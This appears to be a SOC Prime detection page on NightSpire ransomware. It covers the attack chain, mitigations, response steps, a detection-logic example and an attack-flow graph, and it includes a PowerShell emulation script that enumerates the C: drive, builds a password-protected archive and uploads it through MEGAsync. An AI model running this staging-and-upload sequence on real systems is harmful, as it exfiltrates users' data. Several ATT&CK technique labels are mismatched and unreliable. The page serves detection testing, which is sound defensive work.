SOC Prime Bias: High

25 May 2026 16:25 UTC

NightSpire Ransomware Attack Chain, Tools and Tactics

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

NightSpire is a Go-based ransomware family first observed in early 2025 that uses a double-extortion model, stealing data before encryption and threatening to publish it on a Tor-based leak site. The ransomware appends a .nspire extension to encrypted files and places ransom notes in each affected directory, including folders tied to OneDrive. Its operators rely on legitimate remote administration tools to maintain access and use publicly available utilities for discovery, archiving, and exfiltration. Between March and June 2025, the campaign impacted at least 64 organizations across 33 countries.

Investigation

The investigation showed that attackers commonly gained initial access through exposed RDP and then installed Chrome Remote Desktop and AnyDesk as persistent services. They used Everything to quickly locate files, 7-Zip to build password-protected archives, and MEGAsync to upload stolen data to MEGA cloud storage. The Go-based encryptor ran under conhost.exe, enumerated all available drives, and encrypted files while leaving OneDrive filenames unchanged. The extortion phase relied on a Tor-hosted leak site used to pressure victims after exfiltration.

Mitigation

Organizations should reduce or eliminate direct RDP exposure, monitor for unexpected deployment of legitimate remote administration tools as services, and apply application allow-listing to binaries such as Chrome Remote Desktop and AnyDesk. Behavioral detections should focus on mass file enumeration, archive creation, and unusual uploads to cloud storage services. Regular backups and tested recovery procedures remain essential, and network controls should block known MEGA upload endpoints. Defenses can also be validated through controlled ransomware simulation exercises such as those offered by Picus.
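The behavioral correlation described above (a remote-access tool active on a host while file enumeration, password-protected archiving, or a cloud-sync upload occurs) as an added Python example that is not part of the original page or any SOC Prime rule. The selection names, the regular expressions and the sample process-creation events are constructed for illustration; the sample mirrors the tool paths named on this page.

```python
import re
from collections import defaultdict

# Constructed sample process-creation events (not real telemetry) mirroring the chain
# described above; WS02 is a control host that archives with a password but has no
# remote-access tool running, so it must not alert.
EVENTS = [
    {"host": "WS01", "image": r"C:\Program Files (x86)\Google\Chrome Remote Desktop\147.0.7727.3\remoting_host.exe",
     "cmdline": "remoting_host.exe --start-service"},
    {"host": "WS01", "image": r"C:\Program Files\Everything\Everything.exe",
     "cmdline": 'Everything.exe -search "C:"'},
    {"host": "WS01", "image": r"C:\Program Files\7-Zip\7z.exe",
     "cmdline": "7z.exe a -tzip exfil_archive.zip @filelist.txt -pREDACTED"},
    {"host": "WS01", "image": r"C:\Users\jdoe\AppData\Local\MEGAsync\MEGAsync.exe",
     "cmdline": "MEGAsync.exe --upload exfil_archive.zip"},
    {"host": "WS02", "image": r"C:\Program Files\7-Zip\7z.exe",
     "cmdline": "7z.exe a -tzip backup.zip docs -pREDACTED"},
]

# Selection names are hypothetical, chosen to mirror the rule described on this page.
# Each selection is (image-path pattern, command-line pattern); None means "any".
SELECTIONS = {
    "selection_remote_access": (re.compile(r"\\(remoting_host|anydesk)\.exe$", re.I), None),
    "selection_discovery":     (re.compile(r"\\everything\.exe$", re.I), None),
    # 7-Zip "a" (add) together with a -p switch: password-protected archive creation
    "selection_archive":       (re.compile(r"\\7z[g]?\.exe$", re.I), re.compile(r"\s+a\s.*\s-p\S", re.I)),
    "selection_exfiltration":  (re.compile(r"\\megasync\.exe$", re.I), None),
}

def matched_selections(events):
    """Return {host: set of selection names} hit by that host's events."""
    hits = defaultdict(set)
    for ev in events:
        for name, (img_re, cmd_re) in SELECTIONS.items():
            if img_re.search(ev["image"]) and (cmd_re is None or cmd_re.search(ev["cmdline"])):
                hits[ev["host"]].add(name)
    return dict(hits)

def evaluate(events):
    """Apply the condition: remote_access AND (discovery OR archive OR exfiltration)."""
    staging = {"selection_discovery", "selection_archive", "selection_exfiltration"}
    alerts = {}
    for host, names in matched_selections(events).items():
        if "selection_remote_access" in names and names & staging:
            alerts[host] = sorted(names)
    return alerts

if __name__ == "__main__":
    for host, names in evaluate(EVENTS).items():
        print(f"ALERT {host}: {', '.join(names)}")
```

In production the same grouping would be keyed by host and bounded by a time window rather than evaluated over the whole event list.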

Response

If NightSpire activity is detected, isolate the affected endpoint immediately, terminate the encryptor process, and collect volatile memory for analysis. Disable any malicious services, remove persisted remote access tools, and block related network communication. Recovery should proceed from trusted backups, and relevant stakeholders should be notified. The incident should also be reported to law enforcement, while defenders continue monitoring the associated Tor leak site for signs of published data.

Attack Flow

    graph TB
        %% Class definitions
        classDef action fill:#99ccff
        classDef tool fill:#cccccc
        classDef malware fill:#ff6666
        classDef process fill:#ffcc99

        %% Nodes
        action_initial_access["<b>Action</b> – Initial Access<br/><b>Technique</b> – T1136 Create Account<br/><b>Description</b>: Adversary accessed the network via Remote Desktop Protocol to obtain a foothold."]
        class action_initial_access action
        tool_rdp["<b>Tool</b> – Remote Desktop Protocol (RDP)<br/><b>Description</b>: Allows remote login to Windows systems."]
        class tool_rdp tool
        action_persistence["<b>Action</b> – Persistence<br/><b>Technique</b> – T1547.009 Shortcut Modification<br/><b>Description</b>: Installed AnyDesk and Chrome Remote Desktop as services and placed shortcuts in the Startup folder for auto-launch."]
        class action_persistence action
        tool_anydesk["<b>Tool</b> – AnyDesk<br/><b>Function</b>: Remote access software; installed as Windows service and shortcut anydesk.lnk."]
        class tool_anydesk tool
        tool_chrome_rd["<b>Tool</b> – Chrome Remote Desktop<br/><b>Function</b>: Remote access; runs as remoting_host.exe service."]
        class tool_chrome_rd tool
        action_collection["<b>Action</b> – Collection<br/><b>Technique</b> – T1560.001 Archive Collected Data<br/><b>Description</b>: Used 7-Zip to compress selected folders into password-protected archives after enumerating files with Everything utility."]
        class action_collection action
        tool_7zip["<b>Tool</b> – 7-Zip<br/><b>Function</b>: Compresses data into password-protected archives."]
        class tool_7zip tool
        tool_everything["<b>Tool</b> – Everything<br/><b>Function</b>: Fast file-system search utility used for enumeration."]
        class tool_everything tool
        action_exfiltration["<b>Action</b> – Exfiltration<br/><b>Techniques</b> – T1537 Transfer Data to Cloud Account<br/>T1567.002 Exfiltration Over Web Service<br/><b>Description</b>: Uploaded staged archives to MEGA cloud storage via MEGAsync."]
        class action_exfiltration action
        tool_megasync["<b>Tool</b> – MEGAsync<br/><b>Function</b>: Synchronizes local files with MEGA cloud storage for exfiltration."]
        class tool_megasync tool
        action_impact["<b>Action</b> – Impact<br/><b>Technique</b> – T1486 Data Encrypted for Impact<br/><b>Description</b>: Go-based encryptor executed through conhost.exe, encrypted files, appended .nspire extension, and dropped ransom notes in each folder."]
        class action_impact action
        malware_encryptor["<b>Malware</b> – Go Encryptor<br/><b>Function</b>: Encrypts files, appends .nspire, drops ransom notes."]
        class malware_encryptor malware
        process_conhost["<b>Process</b> – conhost.exe<br/><b>Role</b>: Executes the Go encryptor payload."]
        class process_conhost process

        %% Connections
        action_initial_access -->|uses| tool_rdp
        action_initial_access -->|leads_to| action_persistence
        action_persistence -->|installs| tool_anydesk
        action_persistence -->|installs| tool_chrome_rd
        action_persistence -->|leads_to| action_collection
        action_collection -->|uses| tool_7zip
        action_collection -->|enumerates_with| tool_everything
        action_collection -->|leads_to| action_exfiltration
        action_exfiltration -->|uses| tool_megasync
        action_exfiltration -->|leads_to| action_impact
        action_impact -->|executes| process_conhost
        process_conhost -->|launches| malware_encryptor

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands:

    1. Persistence Setup (T1547 / T1219): Install Chrome Remote Desktop (default path) and start its service to obtain persistent remote control.
    2. Discovery (T1083): Use Everything.exe to enumerate all files on the C: drive, saving the output to a temporary list.
    3. Archiving (T1037 / T1083): Invoke 7‑Zip to compress the discovered files into a password‑protected archive.
    4. Exfiltration (T1219.003): Launch MEGAsync to upload the archive to a MEGA account.

    The sequence ensures that selection_remote_access (Chrome Remote Desktop) is active while at least one of selection_discovery, selection_archive, or selection_exfiltration occurs, satisfying the rule’s condition.

  • Regression Test Script:

    # -------------------------------------------------------------------------
    # NightSpire Lateral Persistence & Exfiltration Simulation
    # -------------------------------------------------------------------------
    # Prerequisites:
    #   - Chrome Remote Desktop installed at default path
    #   - Everything.exe installed at default path
    #   - 7z.exe installed at default path
    #   - MEGAsync installed at default user profile path
    # -------------------------------------------------------------------------
    
    # 1. Ensure Chrome Remote Desktop service is running (simulates persistence)
    #    ${Env:ProgramFiles(x86)} must be braced: the parentheses are part of the
    #    variable name and would otherwise be read as literal text in the string.
    $crdPath = "${Env:ProgramFiles(x86)}\Google\Chrome Remote Desktop\147.0.7727.3\remoting_host.exe"
    if (Test-Path $crdPath) {
        Start-Process -FilePath $crdPath -ArgumentList "--start-service" -WindowStyle Hidden
        Write-Host "Chrome Remote Desktop service started."
    } else {
        Write-Error "Chrome Remote Desktop not found at $crdPath"
        exit 1
    }
    
    # 2. File discovery with Everything (enumerates the C: drive into a list file)
    $everythingPath = "$Env:ProgramFiles\Everything\Everything.exe"
    $discoveryOutput = "$env:TEMP\filelist.txt"
    if (Test-Path $everythingPath) {
        & $everythingPath -search "C:" -output $discoveryOutput
        Write-Host "Discovery completed, results saved to $discoveryOutput"
    } else {
        Write-Error "Everything.exe not found at $everythingPath"
        exit 1
    }
    
    # 3. Archive the discovered files with 7-Zip (@listfile feeds the file list; -p sets a password)
    $sevenZipPath = "$Env:ProgramFiles\7-Zip\7z.exe"
    $archivePath   = "$env:TEMP\exfil_archive.zip"
    if (Test-Path $sevenZipPath) {
        & $sevenZipPath a -tzip $archivePath "@$discoveryOutput" -p"StrongP@ssw0rd!"
        Write-Host "Archive created at $archivePath"
    } else {
        Write-Error "7z.exe not found at $sevenZipPath"
        exit 1
    }
    
    # 4. Upload archive via MEGAsync (exfiltration)
    $megaPath = "$Env:LOCALAPPDATA\MEGAsync\MEGAsync.exe"
    if (Test-Path $megaPath) {
        & $megaPath --upload $archivePath
        Write-Host "Upload initiated via MEGAsync."
    } else {
        Write-Error "MEGAsync.exe not found at $megaPath"
        exit 1
    }
    
    # End of simulation

  • Cleanup Commands:

    # Stop Chrome Remote Desktop service
    Stop-Process -Name "remoting_host" -Force -ErrorAction SilentlyContinue
    
    # Remove temporary files (same paths as the simulation script)
    Remove-Item -Path "$env:TEMP\filelist.txt" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMP\exfil_archive.zip" -Force -ErrorAction SilentlyContinue
    
    # Optionally stop MEGAsync if running
    Stop-Process -Name "MEGAsync" -Force -ErrorAction SilentlyContinue